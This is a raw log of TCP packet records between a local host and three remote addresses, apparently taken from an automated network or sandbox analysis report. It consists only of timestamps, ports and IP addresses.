Dec 16, 2024 17:30:17.702712059 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.702824116 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.702903032 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.702912092 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.703071117 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.703174114 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.724376917 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.724411011 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.724637985 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.724647045 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.724703074 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.724821091 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.741735935 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.741745949 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.742047071 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.742055893 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.742198944 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.749347925 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.749608994 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.749618053 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.792630911 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.826663971 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.826675892 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.826911926 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.826991081 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.826999903 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.827156067 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.828727961 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.828979969 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.841422081 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.841454029 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.841577053 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.841655016 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.841664076 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.841834068 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.841927052 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.843314886 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.843468904 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.855331898 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.855341911 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.855564117 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.855572939 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.855640888 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.855734110 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.865272999 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.865283012 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.865498066 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.865506887 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.865572929 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.865691900 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.875211000 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.875221968 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.875432968 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.875441074 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.875582933 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.875662088 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.882416010 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.882477999 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.882720947 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.882730007 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.882790089 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.882891893 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.891335011 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.891345024 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.891510010 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.891587019 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.891596079 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.891680002 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.891860962 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.899785042 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.899795055 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.899946928 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.900049925 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.900058031 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.900127888 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.900310040 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.922686100 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.922696114 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.922986031 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.922995090 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.923317909 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.961359024 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.961369991 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.961543083 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.961734056 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.961743116 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.961891890 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.969048023 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.969058037 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.969381094 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.969389915 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.969549894 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.975529909 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.975539923 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.975722075 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.975907087 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.975915909 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.976128101 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.982490063 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.982501030 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.982681036 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.982745886 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.982754946 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.982943058 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.983043909 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.992413044 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.992423058 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.992584944 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.992594957 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.992599964 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.992717981 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.992790937 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.994925022 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.994935036 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.995160103 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.995168924 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:17.995240927 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:17.995323896 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.000344038 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.000354052 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.000538111 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.000749111 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.000757933 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.001059055 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.005300999 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.005311966 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.005604029 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.005610943 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.005778074 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.010858059 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.010868073 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.011147976 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.011154890 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.011486053 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.015688896 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.015698910 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.016051054 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.016057014 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.016217947 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.020426989 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.020437002 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.020627975 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.020740986 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.020745039 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.020910025 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.022584915 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.022859097 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.027529955 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.027539968 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.027748108 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.027754068 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.027812004 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.027928114 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.029345989 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.031594038 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.031604052 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.031779051 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.031855106 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.031858921 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.032037020 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.032131910 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.033730030 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.036115885 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.036125898 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.036288977 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.036355972 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.036360025 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.036444902 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.036652088 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.038342953 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.039834976 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.039845943 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.040005922 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.040085077 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.040088892 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.040150881 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.040256023 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.043678045 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.043685913 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.043855906 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.043908119 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.043958902 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.043963909 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.044080019 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.044229031 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.047302008 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.057665110 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.090943098 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.090953112 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.091128111 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.091202974 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.091212034 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.091363907 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.091465950 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.094079971 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.094089985 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.094273090 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.094388008 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.094394922 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.094575882 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.097856045 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.097865105 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.098186016 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.098191977 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.098494053 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.101949930 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.101958990 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.102102995 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.102262974 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.102268934 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.102508068 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.105214119 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.105225086 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.105402946 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.105459929 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.105464935 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.105555058 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.105698109 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.108411074 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.108421087 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.108607054 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.108664989 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.108669996 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.108752012 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.108949900 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.111799955 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.111810923 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.111977100 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.112082958 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.112087965 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.112128973 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.112194061 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.112284899 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.115233898 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.115245104 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.115422964 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.115616083 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.115619898 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.115787983 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.116981030 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.118912935 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.118922949 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.119270086 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.119276047 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.119699001 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.126329899 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.127800941 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.127810955 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.128051043 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.128058910 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.128190041 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.128257036 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.131414890 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.131426096 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.131649017 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.131654978 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.131819010 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.131905079 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.133933067 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.133943081 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.134130955 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.134135962 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.134264946 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.134453058 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.136133909 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.136989117 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.136998892 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.137244940 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.137250900 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.137368917 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.137482882 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.139463902 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.139473915 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.139733076 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.139739037 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.139815092 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.139866114 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.141942978 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.141953945 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.142086983 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.142153978 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.142157078 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.142333031 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.142414093 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.144877911 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.144886971 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.145066023 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.145071030 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.145178080 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.145334959 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.147432089 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.147440910 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.147636890 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.147707939 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.147713900 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.147948027 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.149791002 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.149800062 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.149965048 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.149965048 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.149971008 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.150068045 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.150234938 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.152676105 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.152683973 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.152877092 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.152882099 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.152978897 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.153162003 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.154098988 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.154139042 CET	443	49708	185.199.108.133	192.168.11.20
Dec 16, 2024 17:30:18.154252052 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.154345036 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.163187981 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:18.270690918 CET	49708	443	192.168.11.20	185.199.108.133
Dec 16, 2024 17:30:20.627796888 CET	49709	80	192.168.11.20	104.16.184.241
Dec 16, 2024 17:30:20.762401104 CET	80	49709	104.16.184.241	192.168.11.20
Dec 16, 2024 17:30:20.762703896 CET	49709	80	192.168.11.20	104.16.184.241
Dec 16, 2024 17:30:20.762933016 CET	49709	80	192.168.11.20	104.16.184.241
Dec 16, 2024 17:30:20.898236036 CET	80	49709	104.16.184.241	192.168.11.20
Dec 16, 2024 17:30:20.911046982 CET	80	49709	104.16.184.241	192.168.11.20
Dec 16, 2024 17:30:20.963830948 CET	49709	80	192.168.11.20	104.16.184.241
Dec 16, 2024 17:30:26.789707899 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.063812971 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.063962936 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.065135002 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.066083908 CET	49709	80	192.168.11.20	104.16.184.241
Dec 16, 2024 17:30:27.200745106 CET	80	49709	104.16.184.241	192.168.11.20
Dec 16, 2024 17:30:27.200937986 CET	49709	80	192.168.11.20	104.16.184.241
Dec 16, 2024 17:30:27.387697935 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.432596922 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.433207989 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.433310032 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.480303049 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.524967909 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.705184937 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.705595970 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.705606937 CET	1490	49710	89.23.100.233	192.168.11.20
Dec 16, 2024 17:30:27.705748081 CET	49710	1490	192.168.11.20	89.23.100.233
Dec 16, 2024 17:30:27.705802917 CET	49710	1490	192.168.11.20	89.23.100.233
